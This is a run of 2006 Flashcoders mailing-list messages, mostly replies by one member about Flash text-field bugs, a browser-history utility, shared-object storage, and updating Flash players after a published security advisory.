Chris Hill schrieb: hi hello how do I make a multi-player game in flash its got to have lasers thank you eric dolecki wrote: I know of a few... and I am sure at a few points in the past I have almost been one :) On 4/26/06, John Dowdell [EMAIL PROTECTED] wrote: Steven Sacks wrote: http://www.slash7.com/pages/vampires I'm not sure, what's a help vampire...? ;-) jd ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com made my day ;-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] caret colour changes
quinrou . schrieb: Hi all, I am having a problem. The caret or i-beam seems to change colour in a flash text field according to the colour of the text where it is located. Now and then the caret takes the colour of the text it's in and sometimes not. This becomes an issue when the colour of the text is the same as background colour. Because the caret/i-beam disappears. Does anyone know how to overcome that issue or to work around it? Thanks Seb ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com yes: [EMAIL PROTECTED] it's a WELL KNOWN Bug, since , well since too long i guess. MM was not willing to killit, so i guess we'll have to live another lifecycle with this. least help i can give you: add a listener to the Selection Object and everytime one selects text in your textfield apply another textcolor to your text, or change the background of that specific TextField. on de-select restore everything. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] unFocus.History.Keeper
Kevin Newman schrieb: What do you guys think of this? http://www.unfocus.com/projects/source/#Contact what is it good for ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] unFocus.History.Keeper
Kevin Newman schrieb: It's a utility to generate a browser history, and provide support for Deep linking within a Javascript or Flash app primarily. This example mini app also uses an (less robust) alternative to Macromedia's Flash JS Integration kit to provide communication between Javascript and Actionscript. I probably should have mentioned that. :-) nevermind. just write exactly THAT on that page you linked and everything should be fine. and google will find you :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] unFocus.History.Keeper
Kevin Newman schrieb: done. ;-) Michael Stuhr wrote: nevermind. just write exactly THAT on that page you linked and everything should be fine. and google will find you :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com well, now that i know what this does i must say: it works for me: on: winxp: FF 1.5.01 fp:8.5beta, IE6 fp:8.0.24 but on: OSX: safari 2.03 fp:8.0.24 flash's not showing up. it might be related to the fact i'm using this machine through vnc only. An d the only thing i can see right now is, that if i trigger the pulldown (arrow) back and forward button i only see the same page again and again ... but that's a rather little problem i guess. nice to hear from such a project. did you already post this to osflash.org ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] IE vulnerability
Éric Thibault schrieb: Yes I know but now with IE we have to activate every flash and QT on a site by clicking on it + a pupup to activate script (JS)... A lot for commun users! Is the workaround to write the Flash object inside an HTML page on an onload JS fonction working fine to eliminate the click to activate « bug » ? yes, it's well (at least should be) known to workaround that behav. look here ma: http://www.bobbyvandersluis.com/ufo/ or here: http://osflash.org/flashobject micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Beware of depth 9876
Eskil Janson schrieb: I suppose this has been discussed a few times already, but if not: hadn't heard of that, and i'm sure it wasn't already discussed on this list. thanks for the info. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Protecting Shared Objects
John Mark Hawley schrieb: I'm working on a CD product that needs to store a lot of data locally for easy lookup. Before your eyes glaze over and you point me at Zinc, know that this poor little product needs to run on OS 9, OSX, and Windows. Zinc doesn't do OS 9. But, aha, local shared objects! We can use them! Sure we can, but then there's a problem that some wiseguy could wipeout our entire database by clicking around in the Flash plugin settings for a good long time. So: the tentative plan says we could run a little executable via an fscommand at startup that checks to see if the LSO's are in good order, and archives them elsewhere if so. If they've been hosed, the little executable would un-archive the last backup and put them back in the right location. This sounds a little a rinky-dink, but it seems a heck of a lot easier than wrestling with a custom director wrapper and a real database. Just how icky does this sound to everyone? Anyone ever attempt something similar? sounds good. no better sol. from here. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] CSS with input text
Danny Kodicek schrieb: I don't know if this will help you at all, but the TextField.Stylesheet class has a transform() method which will convert _one_ of your style objects from the Stylesheet (ie. The one you maybe assigned for the a or the p element or your_own_custom element) into a TextFormat object which you can then apply to your TextField with setNewTextFormat. If you look at the archives, you'll see that you're not alone. the textfield is one of the worst things i've ever seen. the thing that using css makes TFs uneditable is only the top :-) so let's start a petition against this class, as with coming 8.5 Player we have video alpha, up-and download reg-ex and what not (even a new VM!!!) but this little class is torpeding so much projects (speaking of backends, yeah!) i cant stand it anymore! so let's all stand up, and do sth. against this! we're loosing a market right now. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] updating the ide-players
http://www.macromedia.com/support/flashplayer/downloads.html ~30MB wtf ? :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] updating the ide-players
Fumio Nonaka schrieb: Thank you very much, micha. I have been looking for the url. :) _ Michael Stuhr wrote: http://www.macromedia.com/support/flashplayer/downloads.html ~30MB wtf ? :-) Fumio Nonaka mailto:[EMAIL PROTECTED] http://www.FumioNonaka.com/ My bookshttp://www.FumioNonaka.com/Books/index.html Flash communityhttp://F-site.org/ ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com weren't there yesterday ... so i thought since that was my #1 question, after reading on AM's site that we also have to update the IDE players (whihc makes sense) for that kinda huge whole in the player i think it needs a little bit more effort from Adobe AND Microsoft to force normal users to an update. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] updating the ide-players
Fumio Nonaka schrieb: I installed the players on Flash 8/Mac OS X. While the plug-ins and the standalone players seem to be updated, getVersion() in the test movie returns 8,0,22,0, which is not new version of 8.0r24. Could any Mac users successfully update the Test Movie Player? _ have you uninstalled all players ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] updating the ide-players
Fumio Nonaka schrieb: Thank you for your comments, micha and Isaac. I ran the uninstaller before installed the players. And all the players in the players folder in Flash 8 seem to be updated to 8.0r24. But only in the Test Movie, [List variables], getVersion() and System.capabilities.version return 8,0,22,0. I got the same result in Flash 8/Winsows XP (SP1). _ well if you check the file's themselves, and they say .24 i guess they're ok. it's annoying - even dangerous - that the ide states an older version, but i think we can live with that. btw: i suppose anyone who has some time left, to check their versioncheckers and update them so users are warned when having an older version. what do you guys think ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] crosspost: update your flash-players immediately
http://www.microsoft.com/technet/security/advisory/916208.mspx http://www.macromedia.com/devnet/security/security_zone/apsb06-03.html micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] FP8 AS2 color picker and comboBox
Martin Weiser schrieb: Hello everyone, i seek for color picker component (tried many, Illogiz, not working in as2), please doeas anyone have some really good? And custom combobox. simple as possible, thanks in advance i've done some color picker work on this @ home, can put it OL when back @ home. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com